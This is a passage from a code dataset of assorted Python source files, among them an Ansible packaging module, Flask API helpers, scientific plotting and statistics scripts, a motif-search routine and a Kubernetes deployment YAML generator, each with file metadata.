global_help_data:\r\n print(\"\\t{}()\".format(i.__name__))\r\n print('\\n'.join([\"\\t\\t{}\".format(doc) for doc in (i.__doc__).split(\"\\n\")]))\r\n else:\r\n for i in global_help_data:\r\n if func.__name__ == i.__name__:\r\n print(\"\\t{}()\".format(func.__name__))\r\n print('\\n'.join([\"\\t\\t{}\".format(doc) for doc in (func.__doc__).split(\"\\n\")]))\r\n break\r\n else:\r\n print(\"That function wasn't found! You should probably just run help() to find what you are looking for\")\r\n\r\n@helper\r\ndef challenges():\r\n '''\\\r\nDisplays the names and descriptions of all unlocked and unsolved challenges\r\n '''\r\n result = []\r\n for module in {mod['module'] for mod in global_challenge_list}:\r\n result.append(\"Module: {}\".format(module))\r\n for chal in [i for i in global_challenge_list\r\n if i['module'] == module\r\n and\r\n (not 'solved' in i or i['solved'] == False)\r\n and\r\n (not 'unlock' in i or i['unlock'] <= __score__())]:\r\n result.append(\"\\tName: {}\".format(chal['challenge']))\r\n result.append(\"\\t\\tDescription : {}\".format(chal['description']))\r\n result.append(\"\\t\\tExample Data : {}\".format(repr(chal['example_data'])))\r\n result.append(\"\\t\\tExample Answer: {}\".format(repr(chal['example_answer'])))\r\n print('\\n'.join(result))\r\n return '\\n'.join(result)\r\n\r\n@helper\r\ndef score():\r\n '''\\\r\nDisplays your score per module and overall \r\n '''\r\n result = [\"Total Score: {}\".format(__score__())]\r\n for module in {mod['module'] for mod in global_challenge_list}:\r\n result.append(\"{}: {}\".format(module, sum([i['points'] for i in global_challenge_list\r\n if 'points' in i\r\n and\r\n 'solved' in i\r\n and\r\n i['solved'] == True\r\n and\r\n i['module'] == module])))\r\n print(\"\\n\".join(result))\r\n return \"\\n\".join(result)\r\n\r\nshowhelp()\r\n","sub_path":"game_engine.py","file_name":"game_engine.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6711995","text":"import Image\n\nfrom StringIO import StringIO\n\n\nclass ImageFactory(object):\n\n counter = 0\n\n @classmethod\n def create(self, width=200, height=200, return_file=False):\n \"\"\"\n Returns image file with specified size.\n \"\"\"\n self.counter += 1\n image = Image.new(\n 'RGBA', size=(width, height), color=(256, 0, 0))\n if not return_file:\n return image\n f = StringIO()\n image.save(f, 'png')\n f.name = 'testimage%d.png' % self.counter\n f.seek(0)\n return f\n","sub_path":"cleanenv/apps/accounts/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"530471329","text":"import svmMLiA\ndataArr,labelArr = svmMLiA.loadDataSet('testSet.txt')\nprint(labelArr)\n\n#b,alphas = svmMLiA.smoSimple(dataArr, labelArr, 0.6, 0.001, 40)\n#print(b,alphas[alphas>0])\n\nb,alphas = svmMLiA.smoPK(dataArr, labelArr, 0.6, 0.001, 40)\nws = svmMLiA.calcWs(alphas,dataArr,labelArr)\nfrom numpy import *\ndatMat = mat(dataArr)\nfor i in range(10):\n print(datMat[i]*mat(ws)+b,labelArr[i])\n\n'''\nsvm的分类函数和 模型评估(参数优化)函数中都有向量点积。是针对线性可分问题的\n那么,对于非线性数据的高维映射(在高维下是线性问题),就是要求高维向量的点积。\n如果可以直接表达这些高维向量点积的结果,就不需要先将原始数据做映射再做点积这些步骤。\n核函数,就是两个高维向量点积的结果。\n'''\n\nsvmMLiA.testRbf()\n\nsvmMLiA.testDigits(('rbf',20))","sub_path":"ch 06/ch06.py","file_name":"ch06.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"133122788","text":"from flask import flash\nfrom flask import session\nfrom flask.views import MethodView\nfrom requests import request\n\nfrom app import app\nfrom app.blueprints.auth import helpers as auth_helpers\n\nDOCUMENTS = tuple('rtf odf ods gnumeric abw doc docx xls xlsx pdf'.split())\nIMAGES = tuple('jpg jpe jpeg png gif svg bmp'.split())\n\n\nclass ProtectedView(MethodView):\n decorators = [auth_helpers.token_required]\n\n\ndef api_request(url_tail, method=\"GET\", files=None, json=None):\n error = False\n headers = {}\n if \"token\" in session:\n headers[\"Authorization\"] = session[\"token\"]\n req = request(\n url=f\"{app.config['API']}/{url_tail}\",\n method=method.lower(),\n headers=headers or None,\n json=json,\n files=files\n )\n if req.status_code != 200:\n error = True\n if \"_schema\" in req.json()[\"message\"]:\n flash(req.json()[\"message\"][\"_schema\"][0], category=\"error\")\n else:\n flash(req.json()[\"message\"], category=\"error\")\n elif req.status_code == 200 and isinstance(req.json(), dict) and \"message\" in req.json():\n flash(req.json()[\"message\"], category=\"success\")\n return req.json(), error\n\n\ndef flash_form_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(\n f\"{error}\",\n \"error\"\n )\n\n\ndef string_field_to_list(value):\n return \" \".join(value.split()).split(\" \") if value else None\n\n\ndef list_to_string_field(data, prop_to_pop):\n return {\n \"string\": \" \".join([obj[prop_to_pop] for obj in data]),\n \"list\": [obj[prop_to_pop] for obj in data]\n }\n","sub_path":"app/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"573521201","text":"#!/usr/bin/python\n\nimport os\nimport platform\nimport re\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: prepare_packaging_vars\n\nshort_description: Prepare variables describing package being built.\n\ndescription:\n - \"This module prepares a number of variables that describe package that is being built,\nfor example upstream version, package version, source location, and workspace layout.\"\n\noptions:\n zuul_project: Zuul dictionary with packaging project information.\n\n source_repo: An optional Zuul object for upstream source project. If not given, module will try to locate it based on the packaging repo.\n\nauthor:\n - OpenContrail Developers \n'''\n\n\ndef _debian_get_name_versions(changelog_path):\n '''Returns tuple (package_name (epoch, upstream_version, debian_version)) based on changelog'''\n if not os.path.exists(changelog_path):\n raise RuntimeError(\"changelog is missing at %s\" % (changelog_path,))\n with open(changelog_path, \"r\") as fh:\n manifest = fh.readline()\n\n matcher = \"^(?P[\\w-]+)\\ \\((?P.*)\\).*$\"\n groups = re.match(matcher, manifest)\n if not groups:\n raise RuntimeError(\"Could not parse debian/changelog\")\n return groups.group(1), groups.group(2)\n\n\n\ndef get_package_name_versions(module):\n \"\"\"Returns a dictionary with package information.\"\"\"\n params = module.params\n\n src_dir = params['zuul_project']['src_dir']\n if not os.path.exists(src_dir):\n raise RuntimeError(\"Could not find packaging repository under %s\" % (src_dir,))\n\n distro = params['distribution']\n release = params['release']\n if distro == \"ubuntu\":\n debian_path = os.path.join(src_dir, distro, release, \"debian/\")\n changelog_path = os.path.join(debian_path, \"changelog\")\n\n package_name, version = _debian_get_name_versions(changelog_path)\n\n try:\n (epoch, rest) = version.split(\":\")\n except ValueError:\n epoch, rest = None, version\n\n upstream, debian = rest.split('-')\n # this is not a pre-processed package release, as it's missing\n # ~contrailX version, assume that it's a pristine distro packaging\n # and append .1~contrailX~ubuntuY.\n if not 'contrail' in debian:\n # platform.dist() returns a tuple\n # ('distro', 'version', 'codename')\n ubuntu_version = platform.dist()[1]\n contrail_version = \".1~contrail1~ubuntu{release}\".format(\n release=ubuntu_version\n )\n debian = debian + contrail_version\n\n target_dir = \"%s-%s\" % (package_name, upstream)\n\n return {\n 'name': package_name,\n 'debian_dir': debian_path,\n 'full_version': version,\n 'version': {\n 'epoch': epoch,\n 'upstream': upstream,\n 'distro': debian\n },\n 'target_dir': target_dir,\n }\n\n else:\n raise RuntimeError(\"Unsupported distribution: %s\" % (distro,))\n\n\ndef get_upstream_path(module):\n zuul_project, upstream_repo = module.params['zuul_project'], module.params['source_repo']\n package = get_package_name_versions(module)\n\n if upstream_repo:\n local_path = upstream_repo['src_dir']\n else:\n # deduce local_path based on zuul_project\n # XXX: This assumes that both packaging repository and upstream source are pulled from\n # the same zuul connection.\n packaging_path = zuul_project['src_dir']\n packaging_short_name = zuul_project['short_name']\n\n upstream_repo_name = re.sub(\"^packaging-\", \"\", packaging_short_name)\n packaging_org_dir = \"/\".join(packaging_path.split(\"/\")[:-1])\n\n local_path = os.path.join(packaging_org_dir, upstream_repo_name)\n if not os.path.exists(local_path):\n local_path = None\n\n if local_path is None:\n return None\n\n return {\"source_dir\": local_path }\n\n\nresult = dict(\n changed=False,\n original_message='',\n message='',\n)\n\ndef main(testing=False):\n module = AnsibleModule(\n argument_spec=dict(\n zuul_project=dict(type='dict', required=True),\n source_repo=dict(type='dict', required=False, default=None),\n distribution=dict(type='str', required=True),\n release=dict(type='str', required=True),\n ),\n )\n\n try:\n result['package'] = get_package_name_versions(module)\n upstream_source = get_upstream_path(module)\n if upstream_source:\n result['upstream'] = upstream_source\n except RuntimeError as e:\n module.fail_json(msg=e.message, **result)\n\n module.exit_json(**result)\n\nif __name__ == '__main__':\n main(testing=True)\n","sub_path":"roles/packaging-prepare-generic/library/prepare_packaging_vars.py","file_name":"prepare_packaging_vars.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"390665124","text":"import random\nimport pylab\nimport numpy as np\n\n\ndef dd_func(x): # distribution density\n return x ** (-1 / 3) * 2 / 3 / 7\n\n\ndef func(x):\n return x ** (3 / 2)\n\n\ndef th_func(x):\n return 1 / 7 * (x ** (2 / 3))\n\n\na = 1\nb = 8\nprint(\"Введите N:\")\nn = int(input())\nY = []\nfor _ in range(n):\n Y.append(round(func(random.uniform(a, b)), 2))\ni = 0\nprint(\"Вариационный ряд:\\n\", sorted(Y))\nx = list(sorted(Y))\n\nif n < 100:\n M = int(n ** 0.5)\nelse:\n M = int(2 * np.log(n))\ndx = (x[-1] - x[0]) / M\nintervals = []\nfor i in range(M + 1):\n intervals.append(x[0] + i * dx)\nfrequencies = [0] * (len(intervals) - 1)\nfor i in x:\n j = 1\n while j < len(intervals):\n if i == intervals[j]:\n if j + 1 == len(intervals):\n frequencies[j - 1] += 1\n else:\n frequencies[j - 1] += 0.5\n frequencies[j] += 0.5\n j += 1\n elif i < intervals[j]:\n frequencies[j - 1] += 1\n break\n else:\n j += 1\ny_g1 = frequencies[:]\ni = 0\nwhile i < len(y_g1):\n y_g1[i] = y_g1[i] / (n * dx)\n i += 1\nx_g1_new = []\nfor i in intervals:\n x_g1_new.append(i)\n x_g1_new.append(i)\ny_g1_new = [0]\nfor i in y_g1:\n y_g1_new.append(i)\n y_g1_new.append(i)\ny_g1_new.append(0)\nprint(\"Гистограмма равноинтервальным методом:\")\ni = 1\nwhile i < len(intervals):\n print('\\t\\t{0} при y с \\t({1} , {2})'.format(y_g1_new[2 * i], x_g1_new[2 * i - 1], x_g1_new[2 * i]))\n i += 1\npylab.plot(x_g1_new, y_g1_new)\n# ---------------------------------------------------------------------------------------------------------------------\nxlist = np.arange(x[0] + 0.00001, x[-1], 0.01)\nylist = [dd_func(x) for x in xlist]\npylab.plot(xlist, ylist)\npylab.show()\n# ---------------------------------------------------------------------------------------------------------------------\nx = []\ny = []\nfor i in intervals[:-1]:\n x.append(i + dx / 2)\nfor i in x:\n y.append(Y.count(i))\npylab.plot(x_g1_new, y_g1_new)\npylab.plot(x, y_g1)\npylab.show()\n# ---------------------------------------------------------------------------------------------------------------------\nx_emp = intervals[:]\ny_emp = [0]\nfor i in frequencies:\n y_emp.append(round(y_emp[-1] + i / n, 5))\ny_emp.append(1)\nx_emp_new = [x_emp[0] - 2]\ny_emp_new = []\nfor i in y_emp:\n y_emp_new.append(i)\n y_emp_new.append(i)\nfor i in x_emp:\n x_emp_new.append(i)\n x_emp_new.append(i)\nx_emp_new.append(x_emp[-1] + 2)\nprint(\"Эмпирическая функция распределения:\")\ni = 0\nwhile i < len(x_emp):\n print('\\t\\t{0} ��ри y с \\t({1} , {2})'.format(y_emp_new[2 * i], x_emp_new[2 * i], x_emp_new[2 * i + 1]))\n i += 1\npylab.plot(x_emp_new, y_emp_new)\npylab.show()\n# ---------------------------------------------------------------------------------------------------------------------\nx = list(sorted(Y))\nwhile n % M != 0:\n M -= 1\ndx = n // M\nintervals = [x[0]]\nfor i in range(dx - 1, n, dx):\n intervals.append(x[i])\nfrequencies = []\ni = 0\nwhile i < len(intervals) - 1:\n frequencies.append(dx / (n * (intervals[i+1] - intervals[i])))\n i += 1\ny_g2 = frequencies[:]\nx_g2_new = []\nfor i in intervals:\n x_g2_new.append(i)\n x_g2_new.append(i)\ny_g2_new = [0]\nfor i in y_g2:\n y_g2_new.append(i)\n y_g2_new.append(i)\ny_g2_new.append(0)\nprint(\"Гистограмма равновероятностным методом методом:\")\ni = 1\nwhile i < len(intervals):\n print('\\t\\t{0} при y с \\t({1} , {2})'.format(y_g2_new[2 * i], x_g2_new[2 * i - 1], x_g2_new[2 * i]))\n i += 1\npylab.plot(x_g2_new, y_g2_new)\n# ---------------------------------------------------------------------------------------------------------------------\nxlist = np.arange(x[0] + 0.00001, x[-1], 0.01)\nylist = [dd_func(x) for x in xlist]\npylab.plot(xlist, ylist)\npylab.show()\n# ---------------------------------------------------------------------------------------------------------------------\nx_emp = intervals[:]\ny_emp = [0]\nfor i in frequencies:\n y_emp.append(round(y_emp[-1] + dx / n, 5))\ny_emp.append(1)\nx_emp_new = [x_emp[0] - 2]\ny_emp_new = []\nfor i in y_emp:\n y_emp_new.append(i)\n y_emp_new.append(i)\nfor i in x_emp:\n x_emp_new.append(i)\n x_emp_new.append(i)\nx_emp_new.append(x_emp[-1] + 2)\nprint(\"Эмпирическая функция распределения:\")\ni = 0\nwhile i < len(x_emp):\n print('\\t\\t{0} при y с \\t({1} , {2})'.format(y_emp_new[2 * i], x_emp_new[2 * i], x_emp_new[2 * i + 1]))\n i += 1\npylab.plot(x_emp_new, y_emp_new)\npylab.show()\n# ---------------------------------------------------------------------------------------------------------------------\n","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451165760","text":"# Script to read in and process netCDF file\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport netCDF4\nimport pandas as pd\nfrom pandas import Series\nfrom mpl_toolkits.basemap import Basemap\nfrom datetime import date\n\nncfile=r'D:\\Documents\\TAMU\\Fall 2013\\OCNG 689\\Assignments\\Lab 3'+\\\n r'\\tas_daily_2000-2000.nc' # use at school\n#ncfile=r'C:\\Documents\\TAMU\\Fall 2013\\OCNG 689'+\\\n# r'\\tas_d_2000.nc' # use at home\n\nnc=netCDF4.Dataset(ncfile,mode='r')\n\n#time=np.array(nc.variables['time'][:])\nlat=np.array(nc.variables['latitude'][:])\nlon=np.array(nc.variables['longitude'][:])\nlon[180:]=lon[180:]-360\nlon=abs(lon)\ntsfc=np.array(nc.variables['tas'][:])\ntsfc=np.squeeze(tsfc)\nt_f=(1.8*(tsfc-273))+32\n\ntime=pd.date_range('1/1/2000','12/31/2000')\n\nts=Series(data=t_f[:,120,264],index=time)\nfig2=plt.figure()\nfig2.autofmt_xdate()\n\nax=plt.gca()\nax.set_xlabel('Calendar month')\nax.set_ylabel(u'Temperature [\\u00b0F]')\nax.set_title('Matthew Raper, OCNG 689, Lab 3\\n'+\\\n 'Time Series of Daily Sfc. Air Temp. for Year 2000\\n'+\n 'Location: '+\\\n str(lat[120])+u'\\u00b0N, '+str(lon[264])+u'\\u00b0W')\nplt.grid(True,lw=2.0)\nplt.plot_date(ts.index,ts.values,fmt='b-',lw=2.0,label='Surface temp')\nfigManager = plt.get_current_fig_manager()\nfigManager.window.showMaximized()\nplt.show()\n\n#refyear=2000\n#refday=0\n#refdate=date.fromordinal(date(refyear, 1, 1).toordinal() + refday)\n#refdatestr=str(refdate)\n#\n#m=Basemap(llcrnrlat=-90,llcrnrlon=0,urcrnrlat=90,urcrnrlon=360,\\\n# lat_0=0,lon_0=180,projection='moll')\n#\n#lon,lat=np.meshgrid(lon,lat)\n#x,y=m(lon,lat)\n#t_f2=(1.8*((tsfc[refday,:,:])-273))+32\n#\n#fig=plt.figure()\n#m.drawcoastlines()\n#m.drawcountries()\n#m.drawmeridians(np.linspace(0.0,360.0,13.0,endpoint=True))\n#m.drawparallels(np.linspace(-90.0,90.0,13.0,endpoint=True))\n#plt.pcolormesh(x,y,t_f2,cmap=plt.cm.rainbow)\n#ax=plt.gca()\n#ax.set_title('Matt Raper, OCNG 689, Lab 3\\n'+\\\n# 'Surface Air Temperature for '+refdatestr)\n#cb=plt.colorbar(orientation='horizontal')\n#cb.set_label(u'Surface Air Temperature [\\u00b0F]')\n#plt.show()","sub_path":"Assignments/Lab 3/MRaper_Lab3_script.py","file_name":"MRaper_Lab3_script.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329984730","text":"import logging\nlog = logging.getLogger(\"matches\")\n\n\ndef exact(unmatched_input_spp, unmatched_aln_spp, matched_spp):\n \"\"\" look for exact matches between the keys of two dictionaries \"\"\"\n \n log.info(\"Looking for exact matches between species dictionaries\")\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n matches = set(unmatched_input_spp) & set(unmatched_aln_spp)\n\n unmatched_input_spp, unmatched_aln_spp, matched_spp = process_matches(unmatched_input_spp, unmatched_aln_spp, matched_spp, matches)\n \n log.info(\"%d exact matches found\" %len(matches))\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n log.info(matches) \n log.debug(matched_spp)\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n\ndef process_matches(unmatched_input_spp, unmatched_aln_spp, matched_spp, matches):\n \"\"\" matches is a list of keys of the two dictionaries\"\"\"\n\n for match in matches:\n input_original = unmatched_input_spp.pop(match).original_name\n alnmt_original = unmatched_aln_spp.pop(match).original_name\n matched_spp[input_original] = alnmt_original\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n \ndef choose_maxdata_alnmt_spp(list):\n data = -1\n best = None\n for s in list:\n if s.data >= data:\n best = s\n return best\n \n\ndef exact_binomial(unmatched_input_spp, unmatched_aln_spp, matched_spp, type):\n \"\"\" look for exact binomial matches between species in the two lists \"\"\"\n \n log.info(\"Looking for exact matches between alignment binomial and %s binomial\" % type)\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n\n # build a dictionaries keyed by binomials\n alnmt_binomials = {}\n for s in unmatched_aln_spp.values():\n l = alnmt_binomials.setdefault(s.original_binomial, [])\n l.append(s)\n alnmt_binomials[s.original_binomial] = l\n\n input_binomials = {}\n for s in unmatched_input_spp.values():\n if type == \"original\": \n input_binomials[s.original_binomial] = s\n if type == \"spellchecked\": \n input_binomials[s.binomial] = s\n if type == \"original_genbank\": \n input_binomials[s.original_genbank_binomial] = s\n if type == \"tnrs_genbank\": \n input_binomials[s.tnrs_genbank_binomial] = s\n\n matches = set(input_binomials) & set(alnmt_binomials)\n log.info(\"%d binomial matches found\" %len(matches))\n log.info(matches) \n \n for match in matches:\n input_s = input_binomials[match]\n input_original = input_s.original_name\n unmatched_input_spp.pop(input_s.clean_name)\n \n alnmt_s = choose_maxdata_alnmt_spp(alnmt_binomials[match]) \n alnmt_original = alnmt_s.original_name\n unmatched_aln_spp.pop(alnmt_s.clean_name)\n matched_spp[input_original] = alnmt_original\n\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n log.debug(matched_spp)\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n \ndef choose_best_generic_match(genus, aln_genera):\n \n log.info(\"Looking for genus '%s' in alignment\" % genus)\n \n try:\n alnmt_s = choose_maxdata_alnmt_spp(aln_genera[genus]) \n log.info(\"Best match is '%s'\" % alnmt_s.clean_name)\n except:\n alnmt_s = \"NA\"\n \n return alnmt_s\n \n \ndef genus_replacements(unmatched_input_spp, unmatched_aln_spp, matched_spp, type):\n aln_genera = {}\n matches = {}\n # we make a dictionary keyed by genera\n for s in unmatched_aln_spp.values():\n genus = s.clean_name.split()[0]\n l = aln_genera.setdefault(genus, [])\n l.append(s)\n aln_genera[genus] = l\n \n # now we just loop through the unmatched input species and pop generic matches\n for input_s in unmatched_input_spp.values():\n if type == \"clean_name\" and input_s.clean_name != \"NA\" and len(input_s.clean_name.split())>1:\n genus = input_s.clean_name.split()[0]\n \n else:\n genus = \"NA\" \n\n alnmt_s = choose_best_generic_match(genus, aln_genera)\n if alnmt_s != \"NA\":\n input_original = input_s.original_name\n unmatched_input_spp.pop(input_s.clean_name)\n alnmt_original = alnmt_s.original_name\n unmatched_aln_spp.pop(alnmt_s.clean_name)\n matched_spp[input_original] = alnmt_original\n matches[input_original] = alnmt_original\n \n l = aln_genera[genus]\n i = l.index(alnmt_s)\n removed = l.pop(i)\n aln_genera[genus] = l\n \n log.info(\"%d genus level replacements found\" %len(matches))\n log.info(matches) \n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n ","sub_path":"maker/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"59142466","text":"from collections import Counter\n\ndef InitialMotifs(DNA, k):\n Motifs = []\n for string in DNA:\n Motifs.append(string[:k])\n return Motifs\n\n\ndef Profile(motifs):\n N = len(motifs)\n n = len(motifs[0])\n profile = {\n \"A\": [0 for _ in range(n)],\n \"C\": [0 for _ in range(n)],\n \"T\": [0 for _ in range(n)],\n \"G\": [0 for _ in range(n)],\n }\n for motif in motifs:\n for i in range(len(motif)):\n profile[motif[i]][i] += 1 / N\n return profile\n\n\ndef MostFrequent(profile, string):\n k = len(profile['A'])\n motifs = []\n for i in range(len(string) - k + 1):\n motif = string[i: i + k]\n probability = Probability(profile, motif)\n motifs.append((motif, probability))\n return sorted(motifs, key=lambda x: x[1], reverse=True)[0][0]\n\n\ndef Probability(profile, motif):\n probability = 1\n for i in range(len(motif)):\n nuc = motif[i]\n probability *= profile[nuc][i]\n return probability\n\n\ndef Score(motifs):\n score = 0\n for i in range(len(motifs[0])):\n column = [motif[i] for motif in motifs]\n i = Counter(column)\n score += len(motifs) - i.most_common(1)[0][1]\n return score\n\n\ndef GreedyMotifSearch(DNA, k, t):\n BestMotifs = InitialMotifs(DNA, k)\n for i in range(len(DNA[0]) - k + 1):\n Motifs = []\n motif = DNA[0][i: i + k]\n Motifs.append(motif)\n for i in range(1, t):\n profile = Profile(Motifs)\n Motifs.append(MostFrequent(profile, DNA[i]))\n if Score(Motifs) < Score(BestMotifs):\n BestMotifs = Motifs\n return BestMotifs\n\n\nwith open('/home/masha/Загрузки/rosalind_ba2d.txt', 'r') as f:\n k, t = [int(el) for el in f.readline().split()]\n DNA = []\n for _ in range(t):\n DNA.append(f.readline()[:-1])\n\nBestMotifs = GreedyMotifSearch(DNA, k, t)\n\nwith open('/home/masha/Загрузки/output.txt', 'w') as f:\n f.write('\\n'.join(BestMotifs))","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650111","text":"import math\nimport meep as mp\nfrom meep import mpb\n\n#\nnum_bands = 1\nk_vec_res = 16;\n\nboundary_k_points = [mp.Vector3(),\n mp.Vector3(0.5),\n mp.Vector3(0.5, 0.5),\n mp.Vector3()]\n\nk_points = mp.interpolate(16, boundary_k_points)\n\nfor k_vec in k_points:\n print(k_vec)\n\ngeometry = [mp.Cylinder(0.2, material=mp.Medium(epsilon=2.2))]\ngeometry_lattice = mp.Lattice(size=mp.Vector3(1,1))\nresolution = 64\n\n\nsolver = mpb.ModeSolver(num_bands=num_bands,\n k_points=k_points,\n geometry=geometry,\n geometry_lattice=geometry_lattice,\n resolution=resolution)\n\n# print_heading(\"Square lattice of rods: TE bands\")\nsolver.run_te()\nsolver.run_tm()\n","sub_path":"LearnFirstBandStructure.py","file_name":"LearnFirstBandStructure.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"177275270","text":"budget = int(input())\nseason = input()\ngroup_count = int(input())\n\nfinal_price = 0\ngroup_discount = 0\neven_discount = 5/100\n\nspr_rent = 3000\nsum_rent = 4200\naut_rent = 4200\nwin_rent = 2600\n\neven_group = group_count % 2 == 0\n\nif group_count <= 6:\n group_discount = (10/100)\nelif group_count >= 7 and group_count <= 11:\n group_discount = (15/100)\nelif group_count >= 12:\n group_discount = (25/100)\n\n\nif season == \"Spring\":\n final_price = spr_rent - spr_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\nelif season == \"Summer\":\n final_price = sum_rent - sum_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\nelif season == \"Autumn\":\n final_price = aut_rent - aut_rent * group_discount\nelif season == \"Winter\":\n final_price = win_rent - win_rent * group_discount\n if even_group:\n final_price -= final_price * even_discount\n\n\ndifference = budget - final_price\n\nif budget >= final_price:\n print(f\"Yes! You have {difference:.2f} leva left.\")\nelse:\n print(f\"Not enough money! You need {abs(difference):.2f} leva.\")","sub_path":"nested_ifs/lab_fishing_boat.py","file_name":"lab_fishing_boat.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"556538700","text":"import utils\n\n\nclass DeploymentYamlDirectEnvInfo:\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def yaml(self):\n template = ' ' * 8 + '- name: {0}\\n' + ' ' * 10 + 'value: {1}'\n return template.format(self.name, self.value)\n\n\nclass DeploymentYamlAnnotation:\n def __init__(self, name, value):\n self.name = name\n self.value = value\n\n def yaml(self):\n template = ' ' * 8 + '{0}: {1}'\n return template.format(self.name, self.value)\n\n\nclass DeploymentYamlSecretEnvReference:\n def __init__(self, name, secretKey, secretName):\n self.name = name\n self.secretKey = secretKey\n self.secretName = secretName\n\n def yaml(self):\n template = ' ' * 8 + '- name: {0}\\n' + \\\n ' ' * 10 + 'valueFrom:\\n' + ' ' * 12 + 'secretKeyRef:\\n' + \\\n ' ' * 14 + 'key: {1}\\n' + ' ' * 14 + 'name: {2}'\n return template.format(self.name, self.secretKey, self.secretName)\n\n\nclass DeploymentYamlVolume:\n def __init__(self, name, claimName, mountPath):\n self.name = name\n self.claimName = claimName\n self.mountPath = mountPath\n\n def volumeMountYaml(self):\n template = ' ' * 8 + '- mountPath: {0}\\n' + ' ' * 10 + 'name: {1}'\n return template.format(self.mountPath, self.name)\n\n def volumeYaml(self):\n template = ' ' * 6 + '- name: {0}\\n' + ' ' * \\\n 8 + 'persistentVolumeClaim:\\n' + ' ' * 10 + 'claimName: {1}'\n return template.format(self.name, self.claimName)\n\n\nclass DeploymentYamlInfo:\n __template = '''apiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: {0}\n namespace: {1}\nspec:\n selector:\n matchLabels:\n app: {2}\n replicas: 1\n template:\n metadata:\n labels:\n app: {2}\n{5}\n spec:\n containers:\n - name: {3}\n image: {4}\n imagePullPolicy: Always{11}{12}\n env:\n{6}{7}{8}\n imagePullSecrets:\n - name: {9}\n nodeSelector: \n node-tag: {10}'''\n\n __livenessProbeTemplate_InformationExtraction = '''\n livenessProbe:\n exec:\n command:\n - env\n - \"PYTHONPATH=/app\"\n - python3.8\n - /app/package/healthcheck/general.py\n initialDelaySeconds: 60\n periodSeconds: 60\n timeoutSeconds: 5\n failureThreshold: 2'''\n\n def __init__(self, name, namespace, selectorLabel, containerName, image, imagePullSecret, nodeTag, annotations, envs, volumes, needPrivilegedPermission, livenessProbe):\n self.name = name\n self.namespace = namespace\n self.selectorLabel = selectorLabel\n self.containerName = containerName\n self.image = image\n self.imagePullSecret = imagePullSecret\n self.nodeTag = nodeTag\n self.annotations = annotations\n self.envs = envs\n self.volumes = volumes\n if needPrivilegedPermission is not None and needPrivilegedPermission:\n self.needPrivilegedPermission = True\n else:\n self.needPrivilegedPermission = False\n\n if livenessProbe is None or len(livenessProbe) == 0:\n self.livenessProbeTemplate = ''\n elif livenessProbe == 'information_extraction_livenessProbe':\n self.livenessProbeTemplate = self.__livenessProbeTemplate_InformationExtraction\n\n def create(self, fileName):\n utils.createDirForFile(fileName)\n targetFile = open(fileName, 'w', encoding='utf-8')\n\n annotations_value = ''\n if self.annotations is not None:\n annotations_value = ' annotations:\\n'\n annotation_count = len(self.annotations)\n for index, annotation in enumerate(self.annotations):\n temp_annotation = annotation.yaml()\n if index < annotation_count - 1:\n temp_annotation += '\\n'\n annotations_value += temp_annotation\n\n envs_value = ''\n for index, oneEnv in enumerate(self.envs):\n temp_env = oneEnv.yaml()\n if index < (len(self.envs) - 1):\n temp_env += '\\n'\n envs_value += temp_env\n\n volumeMountsYaml = ''\n volumesYaml = ''\n\n if self.volumes is not None:\n volumeMountsYaml = '\\n volumeMounts:\\n'\n volumesYaml = '\\n volumes:\\n'\n\n for index, oneVolume in enumerate(self.volumes):\n temp_volumeMount = oneVolume.volumeMountYaml()\n temp_volume = oneVolume.volumeYaml()\n if index < (len(self.volumes) - 1):\n temp_volumeMount += '\\n'\n temp_volume += '\\n'\n volumeMountsYaml += temp_volumeMount\n volumesYaml += temp_volume\n\n if self.needPrivilegedPermission:\n securityContext = '''\n securityContext:\n allowPrivilegeEscalation: true\n capabilities: {}\n privileged: true\n procMount: Default\n readOnlyRootFilesystem: false\n runAsNonRoot: false'''\n else:\n securityContext = ''\n\n targetFile.write(self.__template.format(self.name,\n 